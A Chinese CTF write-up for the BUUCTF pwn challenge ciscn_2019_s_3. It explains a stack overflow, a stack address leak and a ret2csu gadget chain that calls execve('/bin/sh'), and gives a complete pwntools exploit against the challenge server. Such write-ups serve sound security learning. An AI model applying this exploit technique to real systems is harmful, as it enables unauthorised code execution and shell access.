BUUCTF-PWN-ciscn_2019_s_3
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
(这里为了省事,自己写了一个小shell脚本)
64位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接
ida一下看一下主函数
这里sys_read和sys_write读取的字符串大小都大于buf的大小,存在栈溢出
syscall
系统调用,指的是用户空间的程序向操作系统内核请求需要更高权限的服务,
比如 IO 操作或者进程间通信。
系统调用提供用户程序与操作系统间的接口,
部分库函数(如 scanf,puts 等 IO 相关的函数实际上是对系统调用的封装 (read 和 write))。
思路
sys_read(0, buf, 0x400uLL);造成栈溢出泄露栈上地址,sys_write(1u, buf, 0x30uLL);输出buf内容,由于write可以输出0x30字节,而buf只有0x10字节,所以可以把栈地址泄露出来,利用栈地址访问栈上所有内容,之后利用_libc_csu_init函数汇编代码段控制寄存器的值,然后进行execeve系统调用
rax = 0x3b
rdi=[/bin/sh]
rsi = 0x0
rdx = 0x0
execve("/bin/sh", 0, 0);
我们需要控制rax为0x3b,rdi指向/bin/sh,rsi=0,rdx=0
_libc_csu_init函数汇编代码
接着寻找一些地址
vuln地址,观察函数可以发现mov rbp,rsp,后面没有其他操作,所以rsp一直等于rbp,那么填满buf的0x10字节后直接覆盖返回地址,不用覆盖ebd
execve系统调用号为0x3b(59)
syscall地址
64位程序,rdi传参,做函数参数
寻找栈顶地址,gdb调试,先在write函数下个断点
buf: 0x7fffffffdc60 ◂— 'aaaaaaaa\n'
查看字符串aaaaaaaa附近内容
write能输出0x30字节的内容即为(0x7fffffffdc60~0x7fffffffdc90)这里0x00007fffffffdd78即为我们泄露的地址,减去栈顶地址0x7fffffffdc60即为相对偏移280,下次程序运行时,我们只需将泄露出的地址减去280即为栈顶地址
exp
from pwn import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'amd64')
sh=remote('node4.buuoj.cn',26115)
vuln_addr=0x0004004ED
execve_addr=0x04004E2
pop_rdi_ret_addr=0x4005a3
libc_csu_gadget_1=0x40059A #pop rbx, rbp, r12, r13, r14, r15,给寄存器赋值
libc_csu_gadget_2=0x0400580 # mov rdx, r13 ; mov rsi, r14 ; mov edi, r15 控制rdx,rsi,edi
syscall_addr=0x00400517
payload=b'a' * 0x10 +p64(vuln_addr)
sh.sendline(payload)
sh.recv(0x20)
addr=u64(sh.recv(8))-280 #addr为栈顶地址(即下面输入的字符串/bin/sh地址)
print(hex(addr))
payload=b'/bin/sh\x00'*2+p64(libc_csu_gadget_1)
payload+= p64(0)*2 + p64(addr+0x50) + p64(0)*3
#pop rbx, rbp, r12, r13, r14, r15 分别为0,0,mov rax ;retgadget段地址,0,0
#返回地址为addr+0x50
payload+= p64(libc_csu_gadget_2) #rdx=r13=0,rsi=r14=0,rdi=r15=0
payload+= p64(execve_addr) #rax=0x3b
payload+= p64(pop_rdi_ret_addr) + p64(addr) #rdi为字符串/bin/sh首地址
payload+= p64(syscall_addr) #进行系统调用syscall
sh.sendline(payload)
sh.interactive()
运行获得shell